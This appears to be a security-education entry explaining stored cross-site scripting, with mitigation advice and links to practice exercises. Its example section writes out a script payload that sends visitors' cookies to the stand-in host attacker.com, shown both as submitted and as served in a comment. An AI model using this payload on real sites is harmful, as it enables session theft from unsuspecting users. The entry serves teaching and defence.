Stored XSS

Stored Cross-Site Scripting (XSS), also known as Persistent XSS, occurs when malicious script is permanently stored on the target server—such as in a database, message forum, comment field, or visitor log—and is later served to users who view the affected content.

How It Works

Unlike reflected XSS, the attacker doesn't need to trick victims into clicking a link. The malicious payload is stored on the server and automatically executed when any user views the page containing the stored data. This makes stored XSS particularly dangerous as it can affect many users.

Example

A vulnerable comment system that stores and displays user comments:

POST /comment
Body: comment=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

Later, when any user views comments:
<div class="comment">
  <script>fetch('https://attacker.com/steal?c='+document.cookie)</script>
</div>

Prevention

• Sanitize and encode all user input before storage
• Encode output when rendering stored content
• Implement Content Security Policy (CSP)
• Use HttpOnly flag on sensitive cookies
• Consider using HTML sanitization libraries for rich text

PentesterLab Exercises

• XSS and MySQL FILE
• Web For Pentester

See Also

• Reflected XSS
• DOM-based XSS
• Content Security Policy (CSP)